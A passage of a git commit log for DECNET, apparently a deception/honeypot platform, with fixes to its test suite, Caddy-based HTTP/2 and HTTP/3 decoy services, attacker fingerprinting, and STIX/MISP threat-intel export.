Compare commits

492 Commits

Author SHA1 Message Date
4586e36d63 fix(test/schema): pin xdist_group to prevent multi-server startup, cap workers at 4
2026-05-16 18:36:26 -04:00
8b3f74b39b fix(deps): pin urllib3>=2.7.0 to resolve CVE-2026-44431 and CVE-2026-44432 2026-05-16 18:26:47 -04:00
0fe9f895d0 feat(test): add test-schema target and SCHEMA_QUICK=1 mode for schemathesis
- Add dedicated test-schema Makefile target (xdist logical, 600s timeout,
  -m fuzz) so schemathesis runs separately from test-fuzz, which was
  spinning up competing uvicorn workers per xdist process
- Exclude all test_schemathesis*.py files from FUZZ_FLAGS via --ignore
- Add schema to _ALL_SUITES between api and fuzz
- Add SCHEMA_QUICK env var (default 0): caps every max_examples to 100
  across all four schemathesis files (4520 -> 600 total examples)
- Fix pre-push hook: use .311 venv and delegate to make test-all FAIL_FAST=0
  instead of hand-rolling five separate pytest invocations
2026-05-16 18:25:40 -04:00
ac332a6ba9 fix(live/mysql): use pytest_asyncio.fixture(loop_scope=module) on mysql_repo
@pytest.fixture on an async fixture ignores loop_scope, so mysql_repo
ran on the per-function loop while mysql_test_db_url's engine was bound
to the module loop — triggering 'Future attached to a different loop'.
2026-05-10 22:45:05 -04:00
e26876ee92 fix(makefile): add -m markers to live/docker/stress/bench targets 2026-05-10 22:43:33 -04:00
6a91858c15 fix(https-template): wire TLS_CERT/TLS_KEY into make_server ssl_context
Server read the env vars but never passed them to make_server, so it
served plain HTTP and the TLS handshake check timed out in live tests.
2026-05-10 22:39:24 -04:00
54dede5077 feat(makefile): add static analysis targets and xdist to SEQ_FLAGS
Add mypy, bandit, vulture, pip-audit as Makefile targets and include
them in test-all. Also enable -n logical on SEQ_FLAGS so live/api/stress
suites run in parallel where async-safe.
2026-05-10 22:37:30 -04:00
b41a7e3115 fix(live tests): use @pytest_asyncio.fixture for module-scoped async fixtures 2026-05-10 22:30:56 -04:00
ab18cd7797 fix(live tests): replace deprecated event_loop fixture with loop_scope="module" on async fixtures 2026-05-10 22:29:57 -04:00
0403cfc6a2 perf(pytest): switch xdist workers from -n 4 to -n logical 2026-05-10 22:28:04 -04:00
349f88252a chore: add Makefile with per-suite test targets; gitignore ATT&CK bundle and pytest dump 2026-05-10 22:27:54 -04:00
59d3351306 fix(fleet): strip digest from build_base tag before APT compatibility check; mark wizard done 2026-05-10 22:27:47 -04:00
80fff1efa4 fix(web): coerce fingerprint_type to string; sync frontend types and tests 2026-05-10 22:27:38 -04:00
a009746dd1 feat(fingerprint): extend syslog_bridge with HTTP/3 and JA4H fingerprinting emission 2026-05-10 22:27:22 -04:00
52f2f65fa3 fix(tests): fix stale asyncio.sleep patches and missing tarpit guards in service isolation tests
After the ingester._sleep alias fix, three tests in test_service_isolation.py
still patched `decnet.web.ingester.asyncio.sleep` (the old global-singleton
path). The ingester now calls `_sleep` directly, so those patches no longer
controlled the ingester's sleep — the worker looped with real asyncio.sleep
and the tests hung indefinitely.

Also: four API lifespan tests had no tarpit_watcher_worker patch, letting the
real tarpit task start. And test_api_survives_db_init_failure patched
`decnet.web.api.asyncio.sleep` (the singleton) instead of the existing
`_retry_sleep` alias.

Fixes:
- patch("decnet.web.ingester._sleep", ...) in the three ingester tests
- add tarpit_watcher_worker patch to all four api lifespan tests
- patch("decnet.web.api._retry_sleep", ...) in db_init_failure test
2026-05-10 22:10:54 -04:00
ff51ce55e2 fix(tests): eliminate tarpit OOM from global asyncio.sleep mock
Two interacting bugs caused asyncio.sleep to be mocked globally,
letting tarpit_watcher_worker spin the event loop on a non-async
mock and accumulate _increment_mock_call records without bound:

1. test_ingester.py patched `decnet.web.ingester.asyncio.sleep` via
   the asyncio singleton — any code in the process using asyncio.sleep
   (including the tarpit worker) hit the fake_sleep side_effect.
   Fix: add `_sleep = asyncio.sleep` alias in ingester.py and patch
   `decnet.web.ingester._sleep` instead — scopes the mock to ingester.

2. test_api_startup_guards.py called `_run_lifespan_startup` without
   DECNET_CONTRACT_TEST=true, which started the real tarpit task in a
   manually-constructed event loop that the tests never cancelled.
   Fix: set DECNET_CONTRACT_TEST=true inside _run_lifespan_startup so
   the lifespan skips all background workers.
2026-05-10 10:06:21 -04:00
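The alias technique from the first fix above can be sketched as follows. This is a minimal illustration, not the project's code: `ingester` here is a hypothetical stand-in module built in-process, and `poll_once` is an invented name. Only the `_sleep = asyncio.sleep` alias and the idea of patching the alias come from the commit message.

```python
import asyncio
import types
from unittest.mock import AsyncMock, patch

# Hypothetical stand-in for a module such as decnet.web.ingester.
ingester = types.ModuleType("ingester_sketch")
ingester._sleep = asyncio.sleep  # module-level alias, as the commit describes


async def _poll_once() -> str:
    # Resolve the alias on the module at call time so a patch takes effect.
    await ingester._sleep(0.01)
    return "polled"


ingester.poll_once = _poll_once  # invented name, for illustration only


def run_patched():
    """Mock only the alias and report whether asyncio.sleep stayed real."""
    original_sleep = asyncio.sleep
    fake_sleep = AsyncMock()
    with patch.object(ingester, "_sleep", fake_sleep):
        asyncio.run(ingester.poll_once())
        # The shared asyncio module is untouched while the alias is mocked.
        untouched = asyncio.sleep is original_sleep
    return untouched, fake_sleep.await_count
```

Because the mock replaces an attribute of one module rather than an attribute of the shared `asyncio` module, other coroutines in the same process keep calling the real `asyncio.sleep`.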
a2c34cac02 fix(tests): prevent xdist worker OOM from leaked tarpit asyncio task
asyncio_default_fixture_loop_scope was 'module', so all async tests in
a module share one event loop. test_lifespan_startup_and_shutdown patched
log_ingestion_worker/log_collector_worker/attacker_profile_worker but not
tarpit_watcher_worker — the real while-True coroutine was created as an
asyncio task on the shared loop and never cancelled. The xdist worker ran
for 4+ hours (confirmed via py-spy + etime=04:48) consuming 15+ GB before
OOM-kill.

Fixes:
- Patch tarpit_watcher_worker in both TestLifespan tests
- Change asyncio_default_fixture_loop_scope to 'function' so each test
  gets its own loop; tasks cannot outlive their test
- Add loop_scope='module' to precision_engine which legitimately needs
  a module-scoped event loop
2026-05-10 09:53:25 -04:00
9a7b03700c refactor(intel): migrate AttackerIntel JSON-string columns to native SQLAlchemy JSON
Five list columns (greynoise_tags, abuseipdb_categories, threatfox_threat_types,
threatfox_ioc_types, threatfox_malware_families) and four dict columns
(*_raw) are now Column(JSON) with list/dict type annotations and
default_factory=list/dict. Providers return native Python objects; the
application-layer json.dumps/json.loads round-trip and _decode_json_list
helpers are gone. to_intel_event_payload() reads columns directly.

Also caps pytest xdist at -n 4 and excludes tests/api via norecursedirs
to prevent schemathesis workers from OOM-killing the dev loop.
2026-05-10 09:17:15 -04:00
de3634d739 feat(ttp): enable 6 xfail tests — evidence shape + tracing spans
- test_evidence_shape.py: replace broken (command, BehavioralLifter)
  pairing with correct (http_fingerprint, HttpFingerprintLifter) case;
  expand _LIFTER_CASES to 5-tuples with per-lifter payloads and rule
  factories; wire StubRuleStore + _index.install() per lifter; remove
  xfail marker — all 4 parametrized cases now pass

- factory.py: add _span() helper gated on _telemetry._ENABLED; wrap
  each per-lifter dispatch in _tag_one() that opens a
  ttp.lifter.{name} child span per call

- http_fingerprint_lifter.py: add missing name = "http_fingerprint"

- test_tracing.py: replace pytest.fail() stubs in
  test_lifter_child_spans_emitted and test_no_pii_canary_in_span_attributes
  with real test bodies; remove xfail markers
2026-05-10 08:51:07 -04:00
c39b63a431 test(ttp): enable test_dropped_intel_enriched_still_produces_intel_tags
Removes the E.3.14b xfail marker and writes the test body:
- _StubRepo gains get_attacker_intel_row_by_uuid(uuid) backed by an
  optional intel_rows dict; existing tests pass None (no catch-up, no
  change to their behaviour).
- The test drives a session.ended event with NO intel.enriched published,
  injects an AttackerIntel row into the stub repo, and asserts the
  tagger is called with source_kind='intel' carrying the correct payload
  fields (abuseipdb_score, greynoise_classification).
- Pins the asymmetry contract: email.received has no catch-up path
  (sibling test already green); intel does.
2026-05-10 08:30:44 -04:00
6e7020f2aa feat(ttp): implement E.3.14b intel catch-up via attacker.session.ended
On every attacker.session.ended event, the TTP worker now reads the
persisted AttackerIntel row (if any) and synthesizes an intel-source
TaggerEvent so intel-derived tags emit even when attacker.intel.enriched
was dropped or arrived before the worker started.

Key changes:
- AttackerIntel.to_intel_event_payload() — single source of truth for
  the intel-row → lifter payload projection; shared by future callers
  without importing decnet.intel.* (no-SPOF contract preserved).
- BaseRepository.get_attacker_intel_row_by_uuid() — returns the live
  SQLModel instance so the catch-up path can call to_intel_event_payload().
- _build_intel_catchup_event() in ttp/worker.py — looks up the intel row,
  builds the TaggerEvent, returns None on absent row (silence, not error).
- _process_event() extended: appends the catch-up event to tagger_events
  when topic contains "session.ended". Deterministic source_id keeps
  compute_tag_uuid idempotent across replays; INSERT OR IGNORE deduplicates
  against any prior attacker.intel.enriched path.

DummyRepo stub + coverage call added per feedback_run_base_repo_test.md.
2026-05-10 08:27:22 -04:00
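The replay-safety argument above (a deterministic source_id plus INSERT OR IGNORE) can be illustrated with a small sketch. Everything named here is an assumption made for illustration: the namespace, the `intel-catchup:` prefix, the key layout, and the table schema are hypothetical, and the real `compute_tag_uuid` inputs are not shown in the log.

```python
import sqlite3
import uuid

# Hypothetical namespace; the project's real namespace is not shown in the log.
_NAMESPACE = uuid.uuid5(uuid.NAMESPACE_DNS, "example.invalid")


def catchup_source_id(attacker_uuid: str) -> str:
    # Derived only from stable inputs, so a replayed event yields the same id.
    return f"intel-catchup:{attacker_uuid}"


def tag_uuid(source_id: str, technique_id: str) -> uuid.UUID:
    # uuid5 is a pure function of (namespace, name): same inputs, same UUID.
    return uuid.uuid5(_NAMESPACE, f"{source_id}|{technique_id}")


def replay_insert_count(replays: int = 2) -> int:
    """Insert the same tag several times and return the resulting row count."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tags (uuid TEXT PRIMARY KEY, technique_id TEXT)")
    for _ in range(replays):
        key = str(tag_uuid(catchup_source_id("attacker-1"), "T1110"))
        # The primary-key collision is silently skipped instead of raising.
        conn.execute("INSERT OR IGNORE INTO tags VALUES (?, ?)", (key, "T1110"))
    count = conn.execute("SELECT COUNT(*) FROM tags").fetchone()[0]
    conn.close()
    return count
```

With a random id instead of a derived one, each replay would produce a new primary key and the table would grow by one row per replay.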
471b33df1b feat(ttp): enable test_abuseipdb_score_30_dropped — impl was already done
Replace pytest.fail() stub with actual test body: constructs IntelLifter
with R0054, feeds score=30 payload, asserts confidence=0.21 (0.70×0.30)
which is below CONFIDENCE_FLOOR. xfail marker removed.

Corrects docstring: R0054 T1110 base_conf=0.70, not 0.85 as originally written.
2026-05-10 08:08:29 -04:00
39518e33b4 feat(ttp): implement evidence-shape validation and confidence range constraint
- TolerantTagger.tag validates evidence keys against EVIDENCE_SCHEMA TypedDicts;
  TypeError (programmer error) propagates instead of being swallowed
- IntelEvidence and EmailEvidence expanded from stubs to full per-provider
  key sets (total=False); IntelEvidence old stub fields replaced wholesale
- EVIDENCE_SCHEMA map added to models/ttp.py and imported by base.py
- TTPTag __table_args__ gains confidence [0,1] CheckConstraint (DB-enforced)
- xfail removed from test_confidence_outside_range_rejected_at_insert and
  test_evidence_shape_violation_propagates_as_typeerror — both now pass
- TypeError removed from _SWALLOWED_EXCS fuzz list; test_intel_evidence_keys
  updated to assert the real provider key set
2026-05-10 07:56:52 -04:00
a8f6a28f3a fix(test): pre-import decnet.cli at collection time to prevent agent-mode stripping
import decnet.cli as _decnet_cli at module level guarantees the app singleton is
built in master mode before any test can set DECNET_MODE=agent. Without this,
test_defence_in_depth_direct_call_fails_in_agent_mode triggered a fresh import
of decnet.cli with DECNET_MODE=agent active, which stripped master-only commands
and wrote the stripped module to sys.modules[decnet].cli — a parent-attribute
corruption that no sys.modules dict restore can fix.
2026-05-10 07:32:43 -04:00
8f6f56f481 fix(test): restore decnet.cli in sys.modules via monkeypatch to prevent agent-mode app stripping from leaking into subsequent tests 2026-05-10 07:18:50 -04:00
6fecf45dcd fix(orchestrator/tests): attribute access on TopologySummary, not dict
emailgen/scheduler.py: topology.email_personas/.language_default
test_heartbeat_topology_resync.py: row.needs_resync (5 occurrences)
2026-05-10 07:11:14 -04:00
4c8ef2f104 fix(orchestrator): _topology_personas accepts TopologySummary or dict 2026-05-10 07:08:39 -04:00
64610bf96e fix(tests): sync 4 tests to current production contracts
- SSH schema: add user + user_password fields (service extended post-test)
- TopologySummary: repo.get_topology() returns model now, not raw dict
- health live: tarpit_watcher added to get_background_tasks(), add to expected set
2026-05-10 06:48:42 -04:00
e4626879f6 perf(pytest): 194s → 4s collection — lazy heavy imports + norecursedirs
Six-part fix for the collection bottleneck that was blocking the dev loop:

1. Lazy mitreattack.stix20 import in attack_stix.py — deferred to first
   _load() call (TYPE_CHECKING guard at top level)

2. Lazy misp_stix_converter import in both MISP export routers — moved
   from module level into the route handler body

3. Lazy attack_catalog / attack_stix in ttp.py repo mixin — thin wrapper
   functions so the import chain never fires at module load time

4. tests/api/conftest.py — `from decnet.web.api import app` moved inside
   the `client()` fixture; `pytest_ignore_collect` broadened to skip all
   test_schemathesis*.py variants (not just test_schemathesis.py), which
   were launching a subprocess server at module-import time

5. pyproject.toml — `norecursedirs` for tests/live, tests/stress,
   tests/service_testing, tests/docker, tests/perf so these directories
   are never entered; `-m` filter removed from addopts (now redundant);
   `--dist loadscope` → `--dist load` to unblock workers immediately

6. behave_core / behave_shell rename — BEHAVE packages dropped the
   `decnet_` prefix; reinstalled editable installs and updated all 14
   import sites across profiler, ttp, bus, and correlation modules
2026-05-10 06:41:25 -04:00
f63aca4186 fix(test): reset _cached_backend before factory dispatch tests 2026-05-10 05:47:26 -04:00
95593cb804 fix(test): access DeckyRow.uuid as attribute, not dict key 2026-05-10 05:36:07 -04:00
16e032b7a5 fix(test): access LANRow.id as attribute, not dict key 2026-05-10 05:26:49 -04:00
967aec56d2 fix(bundle): prune node_modules during agent tarball walk 2026-05-10 05:17:32 -04:00
d3899dde96 fix(test): scrub DECNET_CORS_ORIGINS before domain-sections ini test 2026-05-10 05:17:00 -04:00
c2693aafc3 fix(clustering): filter extra fp keys before splatting into update_identity_fingerprints 2026-05-10 04:51:49 -04:00
92f43b4655 fix(fleet): update BASE_IMAGE test to allow digest-pinned image refs 2026-05-10 04:51:18 -04:00
f11def0af1 fix(collector): strip port from remote_addr before attacker identity resolution
host:port in remote_addr was creating a distinct Attacker row per TCP
connection instead of per IP. Split on the last ':' in parse_rfc5424;
preserve the port as fields['remote_port'] so repeated source ports are
retained as fingerprint signal in bounty payloads.
2026-05-10 04:06:42 -04:00
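A minimal sketch of the split described above, assuming a helper named `split_remote_addr` (a hypothetical name; the commit only says the split happens on the last ':' inside parse_rfc5424). The bracketed and bare IPv6 handling is an added assumption and is not described in the commit.

```python
from typing import Optional, Tuple


def split_remote_addr(remote_addr: str) -> Tuple[str, Optional[str]]:
    """Split 'host:port' on the last ':' and return (host, port or None)."""
    host, sep, port = remote_addr.rpartition(":")
    if not sep or not port.isdigit():
        # No colon, or the tail is not a port number: keep the value whole.
        return remote_addr, None
    if host.startswith("[") and host.endswith("]"):
        # Bracketed IPv6 literal with a port, e.g. "[2001:db8::1]:443".
        return host[1:-1], port
    if ":" in host:
        # Unbracketed IPv6 literal: ambiguous, so do not guess a port.
        return remote_addr, None
    return host, port


def to_fields(remote_addr: str) -> dict:
    # Identity resolution keys on the host; the port is kept as extra signal.
    host, port = split_remote_addr(remote_addr)
    fields = {"remote_addr": host}
    if port is not None:
        fields["remote_port"] = port
    return fields
```

Keying identity on the host alone means two connections from the same IP with different source ports resolve to one attacker, while the port stays available under `remote_port`.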
6a6f5807aa fix(pr3): adapt to quic-go v0.59.0 API — drop H3App, capture h3 SETTINGS via http3.Settingser
quic-go v0.59.0 (shipped with Caddy v2.11.2) removed quic.Connection as
a public interface and quic-go/logging as a public package, breaking
H3App's connection-wrapping approach.

Resolution:
- Remove H3App (h3app.go) entirely; Caddy handles h3 natively when h3
  is in the protocols list.
- Rewrite h3conn.go to keep only tryParseH3ControlStream + varint/name
  utilities (tested, useful for future stream-level tapping if the API
  ever re-exposes it).
- FPHandler.ServeHTTP: for h3 requests, type-assert ResponseWriter to
  http3.Settingser (the public interface exposed by quic-go/http3 v0.59),
  read the peer's Settings after ReceivedSettings channel closes, emit
  h3_settings fp record.
- https/entrypoint.sh: include h3 in CADDY_PROTOCOLS (Caddy now owns
  UDP/443); remove DECNET_H3_GLOBAL block.
- Update go.mod/go.sum to caddy v2.11.2 + quic-go v0.59.0.
- Update test_https_compose_h3_app.py to expect h3 in protocols when
  http/3 is selected, and assert decnet_h3 block is absent.
- All Go tests (9) and Python tests (15) remain green.
2026-05-10 03:43:34 -04:00
5675dd8ebc feat(pr3): canonical wire-order header capture for h1/h2 + H3App for SETTINGS
- Renames caddy.listeners.decnet_h2fp → decnet_fp; adds h1 raw-byte
  header capture (plainTappingConn) and h2 continuous HPACK decode loop
  (parseH2HeadersLoop) so headers_ordered reflects actual wire order, not
  Go map iteration order.
- Adds H3App Caddy module (decnet_h3) that owns UDP/443 via quic-go,
  wraps accepted QUIC connections with h3SettingsTappingConn to intercept
  the h3 control stream and extract RFC 9114 SETTINGS in wire order.
- Wires access_log emission from FPHandler.ServeHTTP via responseCapture.
- Updates syslog_bridge.py (canonical + per-service copies) with inline
  _compute_ja4h and new fp socket record branches: http_request_headers,
  h3_settings, access_log.
- Fixes ingester proto field alias (bridge emits 'proto', ingester expected
  'protocol') and exposes _process_fingerprint_bounties test alias.
- Go tests: h1/h2/h3 golden-byte tests all green; h3_tracer_test covers
  varint parser, GREASE detection, truncated-stream safety.
- Python tests: 15/15 green across bridge JA4H hash parity, ingester
  compat (old + new event shapes), and Caddyfile h3 template assertions.
2026-05-10 03:29:00 -04:00
8d1f26c0c7 fix(https): move Flask backend to 8443 to avoid netns conflict with http service on 8080 2026-05-10 02:31:08 -04:00
44ab42d80c fix(server): add from __future__ import annotations for Python <3.9 compat 2026-05-10 02:23:13 -04:00
d09b891a55 fix(syslog_bridge): add fp socket reader to canonical template — sync was overwriting per-service copies 2026-05-10 02:17:56 -04:00
42b5d97a50 fix(syslog_bridge): rewrite both templates with from __future__ annotations, fp socket imports, and start_fp_socket_reader 2026-05-10 02:06:53 -04:00
1669f25733 fix(syslog_bridge): add from __future__ import annotations for Python <3.9 compat 2026-05-10 01:58:43 -04:00
255ccebf29 fix(entrypoint): fail-fast if Flask does not bind within timeout instead of silently starting Caddy with no backend 2026-05-10 01:51:09 -04:00
d4f391bab1 fix(caddy): remove explicit tls from listener_wrappers — Caddy applies it by default 2026-05-10 01:45:03 -04:00
38cf1e6c6d fix(caddy+syslog): add UnmarshalCaddyfile to H2FP/FP handlers; add start_fp_socket_reader to syslog_bridge 2026-05-10 01:39:04 -04:00
6618b3c2a1 fix(topology): publish UDP/443 on gateway base when https service has http/3 enabled 2026-05-10 01:33:01 -04:00
7b54944fcc fix(https): remove ports from compose fragment — MACVLAN makes port publishing incompatible with network_mode 2026-05-10 01:29:46 -04:00
46963cbeec fix(deployer): chown synced _caddy_modules back to source owner after root copy 2026-05-10 01:26:13 -04:00
f2b0d286b3 fix(caddy): correct caddyhttp import path to modules/caddyhttp 2026-05-10 01:22:00 -04:00
f1ac1b4004 fix(deploy): sync _caddy_modules into http/https build contexts before compose up 2026-05-10 01:11:44 -04:00
3154224f68 fix(docker): hoist ARG BASE_IMAGE before first FROM so it scopes to all stages 2026-05-10 01:05:00 -04:00
724380901f fix(wizard): emit per-decky service config sections instead of prefix group
[decky.https] relied on ini_loader prefix-matching to propagate config
to decky-03/04/05 — silent and fragile. Now emits [decky-03.https],
[decky-04.https], [decky-05.https] explicitly so the INI is self-evident
and doesn't depend on pattern matching side-effects.
2026-05-10 01:00:43 -04:00
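The explicit per-decky sections described above could be emitted along these lines. This is a sketch under stated assumptions: `render_service_sections` and the `http_versions` option value are hypothetical, and the wizard's real emitter is not shown in the log.

```python
import configparser
import io


def render_service_sections(decky_names, service, options):
    """Emit one explicit [<decky>.<service>] section per decky."""
    parser = configparser.ConfigParser()
    for name in decky_names:
        # A copy per section, so later edits to one decky do not leak to others.
        parser[f"{name}.{service}"] = dict(options)
    buf = io.StringIO()
    parser.write(buf)
    return buf.getvalue()
```

For example, `render_service_sections(["decky-03", "decky-04"], "https", {"http_versions": "h1,h2"})` yields a `[decky-03.https]` and a `[decky-04.https]` section, each carrying its own copy of the options, with no shared prefix section for a loader to pattern-match.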
52a52eee78 fix(network): reload network before checking Containers on IPAM drift
networks.list() returns bare objects — Containers is always empty
without a reload(). The active-endpoint guard from the prior commit
never fired because it was checking a stale empty dict.
2026-05-10 00:56:56 -04:00
251181255b fix(network): reuse existing decnet_lan when active deckies are connected
Docker refuses network removal (403) when containers hold endpoints.
The old IPAM-drift path tried to disconnect+remove even with live
containers — disconnect silently failed, remove raised APIError.

Since DECNET assigns IPs explicitly in compose (never via Docker's
auto-assign pool), an ip_range mismatch on an existing same-driver
network is harmless. Bail out early and attach to the existing network
whenever Containers is non-empty.
2026-05-10 00:50:41 -04:00
92632d7afd feat(pr2): HTTP/2+HTTP/3 fingerprint extractors — JA4H, H2 SETTINGS, JA4-QUIC 2026-05-10 00:47:19 -04:00
0653e500b5 feat(services): HTTP/2 + HTTP/3 support via Caddy reverse-proxy
Swap Werkzeug for Caddy as the protocol layer for http and https decoy
services. Flask keeps owning app logic (fake_app, custom_body, headers,
syslog) on 127.0.0.1:8080; Caddy terminates h1/h2/h2c/h3 on the wire
with real-world TLS/QUIC fingerprints.

- Add `multi_enum` FieldType to ServiceConfigField + _coerce
- Add `http_versions` field to HTTPService (h1/h2c) and HTTPSService
  (h1/h2/h3); selecting h3 emits UDP/443 port mapping in compose
- Rewrite both Dockerfiles with multi-stage Caddy binary copy +
  setcap for port binding as the logrelay user
- Entrypoints parse HTTP_VERSIONS JSON, render a Caddyfile, start
  Flask in background, wait for it, then exec Caddy
- https/server.py drops direct TLS handling; Caddy owns the cert
- Add ProxyFix to both server.py so Flask sees real attacker IPs
- Frontend: multi_enum checkbox-group renderer in ServiceConfigFields;
  FormValue union extended to string[]; compactPayload skips []
- Fix stale test_smtp_relay_schema_matches_smtp: relay schema is a
  superset of smtp, not equal; update assertions accordingly
2026-05-10 00:04:37 -04:00
ec5b49144e fix(ui): transparent input bg fallback so light-mode text is legible 2026-05-09 23:24:37 -04:00
8dde954559 feat(ui): restyle LLMTab with DeckyFleet/PersonaGeneration form vocabulary 2026-05-09 23:23:25 -04:00
d1478f900c fix(ui): remove unused _SENTINEL from LLMTab 2026-05-09 23:21:29 -04:00
39eb1ce5db refactor(ui): move LLM provider config into Config tab, remove standalone route 2026-05-09 23:20:11 -04:00
c66749209f feat(ui): LLMConfig panel + route (/realism-llm) + nav entry 2026-05-09 23:15:27 -04:00
41b8e9b7b3 feat(realism/llm): GET/PUT /api/v1/realism/llm + worker hot-reload tick 2026-05-09 23:12:29 -04:00
155ab59ee8 feat(realism/llm): DB-backed LLMConfig, factory DB-first dispatch, Ollama HTTP mode 2026-05-09 23:09:36 -04:00
f10201e885 feat(secrets): Fernet encrypt/decrypt helper for DB-stored operator secrets 2026-05-09 23:07:24 -04:00
4c6b12dcf8 feat(stix_export): wire fingerprint bounties through all endpoints + tests
Remaining files from the fingerprint-bounties + characterizes-SRO commit:
misp_export, repository, bounties mixin, all 4 router endpoints, and test suite
updates. Prerequisite: previous commit added _extract_fingerprint_bounty_data
and the stix_export changes.
2026-05-09 09:14:48 -04:00
51d0fc7b6c feat(stix_export): HTTP quirks + JARM in protocol_fingerprints; characterizes SRO
Wire fingerprint bounties (JARM hashes, HTTP header quirks) from the bounties
table into the DecnetActorFingerprintExt.protocol_fingerprints group so the
sniffer/profiler-captured HTTP fingerprinting data surfaces in every STIX export.

Add a stix2.Relationship(relationship_type="characterizes") SRO linking each
x-decnet-behave-profile SDO back to its ThreatActor so graph-traversal tools
can follow the edge without relying on the bare x_decnet_behave_profile_ref
custom string property alone.

New repo surface:
- get_fingerprint_bounties_by_ip(ip) -> list[dict]
- get_all_fingerprint_bounties_for_export() -> dict[str, list[dict]]

All 4 export endpoints (per-attacker + fleet, STIX + MISP) extended with the
new gather slot. 50/50 tests green, mypy clean.
2026-05-09 09:14:29 -04:00
ef13e1fe4e test 2026-05-09 09:12:09 -04:00
97c99a4e03 feat(ttp): rich ThreatActor STIX extensions via CustomExtension + CustomObject
- stix_custom.py: DecnetActorFingerprintExt (@CustomExtension) wrapping
  network_behavior (os_guess/hop_distance/tcp_fingerprint/timing_stats/
  phase_sequence/behavior_class/beacon fields/tool_guesses) and
  protocol_fingerprints (ja3_hashes/hassh_hashes/kex_order_raw/
  ssh_client_banners/tls_cert_sha256/payload_simhashes/c2_endpoints).
  XDecnetBehaveProfile (@CustomObject x-decnet-behave-profile) carrying
  full BEHAVE-SHELL observation envelopes + kd_digraph_simhash.
  FINGERPRINT_EXT_DEF singleton extension-definition SDO.
- Drop legacy flat x_decnet_ja3_hashes / x_decnet_hassh_hashes /
  x_decnet_c2_endpoints (pre-v1, no consumers).
- stix_export: _threat_actor() wired to behavior + observations;
  build_attacker_bundle/build_fleet_bundle grow observations parameter.
- Repo: list_observations_by_attacker + get_all_observations_for_export
  abstract + sqlmodel impl; all four export endpoints extended.
- 18 new tests; inter-DECNET round-trip (stix2.parse → typed objects)
  is the primary fidelity assertion.
2026-05-09 08:52:19 -04:00
1200ac9132 feat(stix): STIX→MISP download export (per-attacker + fleet)
Adds GET /api/v1/attackers/{uuid}/export/misp and
GET /api/v1/attackers/export/misp backed by misp_export.py, which
converts existing STIX bundles to MISP events via misp-stix
ExternalSTIX2toMISPParser. Fleet endpoint emits {response:[...]}
collection (one event per attacker). Frontend: STIX/MISP buttons on
AttackerDetail header and Attackers list. 13 new tests green.
2026-05-09 08:04:25 -04:00
8990d9321d fix(ttp/stix): add Sighting SRO per process execution to link commands to threat-actor 2026-05-09 07:47:44 -04:00
d6a091be75 fix(ttp/stix): extract commands from both 'command' and 'command_text' keys 2026-05-09 07:43:44 -04:00
e548be3c49 feat(web): wire EXPORT button to fleet STIX endpoint 2026-05-09 07:40:07 -04:00
c210a56fc8 feat(ttp/stix): fleet-wide STIX 2.1 export — GET /api/v1/attackers/export/stix 2026-05-09 07:37:41 -04:00
f827197cc8 feat(ttp/stix): add deduped process SCOs for attacker commands 2026-05-09 07:33:30 -04:00
1ee7a4a481 fix(ttp/stix_export): _aware() handles ISO string timestamps from DB 2026-05-09 07:26:48 -04:00
915bc6d7ef feat(web): add Download STIX button to AttackerHeader 2026-05-09 07:24:59 -04:00
fe0ed4a251 feat(ttp): STIX 2.1 bundle export for individual attackers
GET /api/v1/attackers/{uuid}/export/stix returns a self-contained STIX
2.1 bundle: ip observation, threat-actor, ATT&CK attack-patterns with
canonical MITRE IDs, uses relationships, per-tag sightings, file SCOs
for artifacts, domain-name SCOs for SMTP targets, and a provider intel
note. Attack-pattern SDOs carry the MITRE bundle IDs so consumers
deduplicating against the public ATT&CK bundle get exact matches.
2026-05-09 07:21:22 -04:00
c4d6eb5bb3 feat(web): mitre_url deeplinks + lazy groups subpanel in TTPInspector
Every technique_id in TechniqueBar and TTPInspector now links to its
canonical attack.mitre.org page. The inspector drawer gains a GROUPS
subpanel that lazy-fetches the new /ttp/techniques/{id}/groups endpoint
and renders each MITRE-tracked intrusion-set with deeplink and aliases.

Centralizes TTP row interfaces into src/types/ttp.ts and API wrappers
into src/utils/ttpApi.ts to give the new GroupRef type a clean home and
avoid a third inline fetch declaration.
2026-05-09 06:57:10 -04:00
1d3086a5c7 feat(web): GET /api/v1/ttp/techniques/{id}/groups — MITRE-tracked groups using a technique
Surfaces the intrusion-set reverse index from the loaded ATT&CK
bundle: given a technique, returns the list of groups MITRE has
documented as using it. Read-only — explicitly NOT an attribution
claim about a DECNET attacker. The frontend pulls this lazily when
the operator expands a technique panel; payload-size cost on every
TTPTagDetailRow makes embedding wasteful for techniques with 50+
documented groups.

- decnet/web/router/ttp/api_get_groups_for_technique.py exposes
  GET /api/v1/ttp/techniques/{technique_id}/groups, response_model
  list[GroupRef]. Same JWT-viewer auth gating as the rest of the
  TTP router. 404 when the technique_id doesn't resolve in the
  bundle.
- Sub-techniques are queried directly (no auto-union with parent)
  to match ATT&CK Navigator semantics; callers that want a broader
  view query the parent themselves.
- tests/ttp/test_groups_for_technique.py covers happy path, 404,
  sub-technique attribution independence, empty-list-on-zero-groups,
  and that responses include mitre_url + aliases.
- tests/web/test_api_attackers.py: fix pre-existing fixture drift
  introduced by a2a61b63 — three TestGetAttackerDetail cases were
  missing AsyncMock for repo.latest_observation_per_primitive,
  causing TypeError on await of MagicMock. The new groups endpoint
  doesn't share code with attacker_detail; this is a drive-by fix
  surfaced by the same suite run.
2026-05-09 06:45:25 -04:00
84a075e405 feat(ttp): promote mitre_url to first-class TTPTag column + propagate everywhere
Phase 2 attached mitre_url to intel-emitted tags' evidence JSON;
Phase 3 promotes it to a real column populated for *every* tag —
intel, credential, behavioral, canary, identity, email, rule-engine —
from one source. Pre-v1, so the SQLModel field is added directly
without an Alembic migration.

- TTPTag gains mitre_url: Optional[str] (not indexed — derived
  deeplink, not a query target; technique_id is already indexed).
- _emit.py and rule_engine._evaluate_rules both populate mitre_url
  via attack_stix.mitre_url_for(sub_technique_id or technique_id).
  Sub-technique URL when present, else parent. The two construction
  sites stay separate because the rule_engine path carries per-emit
  span instrumentation that emit_tags() can't preserve without
  threading a span object through; minimal-change beats forced
  refactor here.
- intel_lifter strips mitre_url from evidence_extra in all four
  decision functions. The column is canonical now; duplicating in
  the JSON column would drift when the bundle moves. The unused
  TechniqueEmission import + tracking dicts removed too.
- IdentityTechniqueRow / TechniqueRollupRow / TTPTagDetailRow /
  CampaignTechniqueRow gain mitre_url: Optional[str].
- sqlmodel_repo/ttp.py:_mitre_url_for added; the 5 row-builder sites
